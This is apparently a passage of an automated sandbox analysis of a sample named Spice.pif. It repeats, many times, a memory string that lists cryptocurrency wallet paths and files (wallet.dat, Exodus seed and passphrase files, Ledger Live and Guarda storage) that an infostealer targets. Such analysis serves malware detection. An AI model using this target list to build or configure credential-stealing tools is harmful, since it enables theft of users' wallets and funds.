Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron 